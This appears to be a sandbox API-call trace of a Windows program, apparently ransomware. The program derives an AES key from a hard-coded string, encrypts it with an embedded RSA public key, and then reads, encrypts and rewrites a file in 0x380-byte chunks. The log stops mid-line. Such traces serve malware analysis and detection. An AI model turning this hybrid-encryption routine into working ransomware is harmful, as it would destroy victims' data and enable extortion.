[0278.145] lstrlenA (lpString="mFAiKoqVtEXtrqexmwxcuDQAzMlQm") returned 29 [0278.145] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0278.145] CryptDeriveKey (in: hProv=0x2f2d600, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0278.149] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0278.149] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0278.149] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2d0b0) returned 1 [0278.150] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2d0b0, dwCertEncodingType=0x1, pInfo=0x2f37090*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f370c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f370c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fba08) returned 1 [0278.150] CryptEncrypt (in: hKey=0x2fba08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0278.150] CryptEncrypt (in: hKey=0x2fba08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2e018*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2e018*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0278.150] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f2e018*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2e018*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0278.152] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.447] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.447] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.501] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.509] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.510] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.510] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.510] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.510] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.510] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.511] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.511] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.511] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.511] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.511] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.512] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.512] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.512] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.512] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.512] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.512] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.512] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.512] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.513] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.513] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.513] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.513] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.513] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.513] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.513] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.513] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.513] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.513] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.513] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.513] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.513] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.514] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.514] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.514] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.514] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.514] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.514] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.514] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.514] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.514] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.514] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.514] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.514] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.514] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.515] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.515] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.515] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.516] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.516] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.516] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.516] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.516] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.516] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.516] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.516] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.516] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.516] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.516] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.516] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.517] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.517] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.517] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.517] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.517] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.517] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.517] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.517] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.517] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.517] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.517] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.517] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.517] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.517] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.518] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.518] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.518] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.518] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.518] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.518] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.518] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.518] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.519] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.520] 